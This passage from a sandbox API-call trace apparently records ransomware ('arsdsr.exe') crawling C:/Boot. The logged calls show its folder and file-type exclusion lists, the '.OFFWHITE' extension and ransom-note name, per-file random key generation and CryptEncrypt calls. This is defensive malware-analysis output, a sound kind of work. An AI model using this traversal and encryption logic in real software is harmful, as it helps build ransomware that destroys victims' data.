"c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.233] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.233] GetProcessHeap () returned 0x500000 [0082.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a8a0 [0082.233] GetProcessHeap () returned 0x500000 [0082.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a8b8 [0082.233] GetProcessHeap () returned 0x500000 [0082.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x532098 [0082.233] GetProcessHeap () returned 0x500000 [0082.233] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x52bea8 [0082.233] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.233] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.233] SystemFunction036 (in: RandomBuffer=0x52a8a0, RandomBufferLength=0x10 | out: RandomBuffer=0x52a8a0) returned 1 [0082.233] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.233] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.233] SystemFunction036 (in: RandomBuffer=0x52a8b8, RandomBufferLength=0x10 | out: RandomBuffer=0x52a8b8) returned 1 [0082.233] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.233] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.233] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x532098*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x532098*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.233] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.233] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.233] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x52bea8*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x52bea8*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.234] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.234] SetLastError (dwErrCode=0x0) [0082.234] WriteFile (in: hFile=0xffffffff, lpBuffer=0x532098, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.234] GetLastError () returned 0x6 [0082.234] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8132526, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16640, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.234] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.234] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="el-GR", cAlternateFileName="")) returned 1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2=".") returned 1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="..") returned 1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="...") returned 1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="windows") returned -1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="$recycle.bin") returned 1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="rsa") returned -1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="ntuser.dat") returned -1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="programdata") returned -1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="appdata") returned 1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="program files") returned -1 [0082.234] lstrcmpiW (lpString1="el-GR", lpString2="program files (x86)") returned -1 [0082.234] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.234] lstrcatW (in: lpString1="C:/Boot\\", lpString2="el-GR" | out: lpString1="C:/Boot\\el-GR") returned="C:/Boot\\el-GR" [0082.234] lstrcatW (in: lpString1="C:/Boot\\el-GR", lpString2="\\" | out: lpString1="C:/Boot\\el-GR\\") returned="C:/Boot\\el-GR\\" [0082.235] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\el-GR\\" | out: lpString1="C:/Boot\\el-GR\\") returned="C:/Boot\\el-GR\\" [0082.235] lstrcatW (in: lpString1="C:/Boot\\el-GR\\", lpString2="*.*" | out: lpString1="C:/Boot\\el-GR\\*.*") returned="C:/Boot\\el-GR\\*.*" [0082.235] FindFirstFileW (in: lpFileName="C:/Boot\\el-GR\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.235] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.235] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.235] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.235] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.235] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.235] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.235] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.235] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.236] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.236] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.236] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.236] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.236] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.236] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.236] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.236] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.236] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\el-GR\\" | out: lpString1="C:/Boot\\el-GR\\") returned="C:/Boot\\el-GR\\" [0082.236] lstrcatW (in: lpString1="C:/Boot\\el-GR\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\el-GR\\bootmgr.exe.mui") returned="C:/Boot\\el-GR\\bootmgr.exe.mui" [0082.236] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.236] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.236] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.236] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.237] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.237] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.237] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.237] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.237] GetProcessHeap () returned 0x500000 [0082.237] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bdd0 [0082.237] CreateFileW (lpFileName="C:/Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.238] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.238] GetProcessHeap () returned 0x500000 [0082.238] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a8d0 [0082.238] GetProcessHeap () returned 0x500000 [0082.238] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a900 [0082.238] GetProcessHeap () returned 0x500000 [0082.238] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x531190 [0082.238] GetProcessHeap () returned 0x500000 [0082.238] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x527d18 [0082.238] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.238] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.238] SystemFunction036 (in: RandomBuffer=0x52a8d0, RandomBufferLength=0x10 | out: RandomBuffer=0x52a8d0) returned 1 [0082.238] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.238] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.238] SystemFunction036 (in: RandomBuffer=0x52a900, RandomBufferLength=0x10 | out: RandomBuffer=0x52a900) returned 1 [0082.238] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.238] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.238] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x531190*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x531190*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.239] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.239] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.239] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x527d18*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x527d18*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.239] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.239] SetLastError (dwErrCode=0x0) [0082.239] WriteFile (in: hFile=0xffffffff, lpBuffer=0x531190, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.239] GetLastError () returned 0x6 [0082.239] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.239] FindClose (in: hFindFile=0x544690 | out: hFindFile=0x544690) returned 1 [0082.239] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe000c, dwReserved1=0x295fd70, cFileName="en-US", cAlternateFileName="")) returned 1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2="...") returned 1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2="$recycle.bin") returned 1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2="rsa") returned -1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2="programdata") returned -1 [0082.239] lstrcmpiW (lpString1="en-US", lpString2="appdata") returned 1 [0082.240] lstrcmpiW (lpString1="en-US", lpString2="program files") returned -1 [0082.240] lstrcmpiW (lpString1="en-US", lpString2="program files (x86)") returned -1 [0082.240] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/Boot\\" | out: lpString1="C:/Boot\\") returned="C:/Boot\\" [0082.240] lstrcatW (in: lpString1="C:/Boot\\", lpString2="en-US" | out: lpString1="C:/Boot\\en-US") returned="C:/Boot\\en-US" [0082.240] lstrcatW (in: lpString1="C:/Boot\\en-US", lpString2="\\" | out: lpString1="C:/Boot\\en-US\\") returned="C:/Boot\\en-US\\" [0082.240] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/Boot\\en-US\\" | out: lpString1="C:/Boot\\en-US\\") returned="C:/Boot\\en-US\\" [0082.240] lstrcatW (in: lpString1="C:/Boot\\en-US\\", lpString2="*.*" | out: lpString1="C:/Boot\\en-US\\*.*") returned="C:/Boot\\en-US\\*.*" [0082.240] FindFirstFileW (in: lpFileName="C:/Boot\\en-US\\*.*", lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName=".", cAlternateFileName="")) returned 0x544690 [0082.240] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.240] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="..", cAlternateFileName="")) returned 1 [0082.240] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.240] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.240] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8216d3c, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x14c40, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.240] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2=".") returned 1 [0082.240] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="..") returned 1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="...") returned 1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="windows") returned -1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$recycle.bin") returned 1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="rsa") returned -1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="programdata") returned -1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="appdata") returned 1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files") returned -1 [0082.241] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="program files (x86)") returned -1 [0082.241] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\en-US\\" | out: lpString1="C:/Boot\\en-US\\") returned="C:/Boot\\en-US\\" [0082.241] lstrcatW (in: lpString1="C:/Boot\\en-US\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:/Boot\\en-US\\bootmgr.exe.mui") returned="C:/Boot\\en-US\\bootmgr.exe.mui" [0082.241] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.241] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.241] PathFindExtensionW (pszPath="bootmgr.exe.mui") returned=".mui" [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.241] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.242] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.242] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.242] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.242] GetProcessHeap () returned 0x500000 [0082.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bdc0 [0082.242] CreateFileW (lpFileName="C:/Boot\\en-US\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-us\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.242] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295ebe0 | out: lpFileSize=0x295ebe0*=-4251587516) returned 0 [0082.242] GetProcessHeap () returned 0x500000 [0082.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a918 [0082.242] GetProcessHeap () returned 0x500000 [0082.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x52a930 [0082.242] GetProcessHeap () returned 0x500000 [0082.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x532a30 [0082.242] GetProcessHeap () returned 0x500000 [0082.242] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x532b38 [0082.242] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.242] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.242] SystemFunction036 (in: RandomBuffer=0x52a918, RandomBufferLength=0x10 | out: RandomBuffer=0x52a918) returned 1 [0082.242] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.242] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.242] SystemFunction036 (in: RandomBuffer=0x52a930, RandomBufferLength=0x10 | out: RandomBuffer=0x52a930) returned 1 [0082.242] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.242] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.242] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x532a30*, pdwDataLen=0x295e990*=0x10, dwBufLen=0x100 | out: pbData=0x532a30*, pdwDataLen=0x295e990*=0x100) returned 1 [0082.243] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.243] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.243] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x532b38*, pdwDataLen=0x295e98c*=0x10, dwBufLen=0x100 | out: pbData=0x532b38*, pdwDataLen=0x295e98c*=0x100) returned 1 [0082.243] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295ec44, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.243] SetLastError (dwErrCode=0x0) [0082.243] WriteFile (in: hFile=0xffffffff, lpBuffer=0x532a30, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295ebcc, lpOverlapped=0x0) returned 0 [0082.243] GetLastError () returned 0x6 [0082.243] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xc3080a8, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0xaa50, dwReserved0=0x295ebbc, dwReserved1=0x1adaabb2, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2=".") returned 1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="..") returned 1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="...") returned 1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="windows") returned -1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$recycle.bin") returned 1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="rsa") returned -1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="ntuser.dat") returned -1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="programdata") returned -1 [0082.243] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="appdata") returned 1 [0082.244] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="program files") returned -1 [0082.244] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="program files (x86)") returned -1 [0082.244] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Boot\\en-US\\" | out: lpString1="C:/Boot\\en-US\\") returned="C:/Boot\\en-US\\" [0082.244] lstrcatW (in: lpString1="C:/Boot\\en-US\\", lpString2="memtest.exe.mui" | out: lpString1="C:/Boot\\en-US\\memtest.exe.mui") returned="C:/Boot\\en-US\\memtest.exe.mui" [0082.244] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.244] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.244] PathFindExtensionW (pszPath="memtest.exe.mui") returned=".mui" [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".exe") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".log") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".cab") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".cmd") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".com") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".cpl") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".ini") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".dll") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".url") returned -1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".ttf") returned -1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".mp3") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".pif") returned -1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".mp4") returned 1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".OFFWHITE") returned -1 [0082.244] lstrcmpiW (lpString1=".mui", lpString2=".msi") returned 1 [0082.244] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.244] GetProcessHeap () returned 0x500000 [0082.244] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, 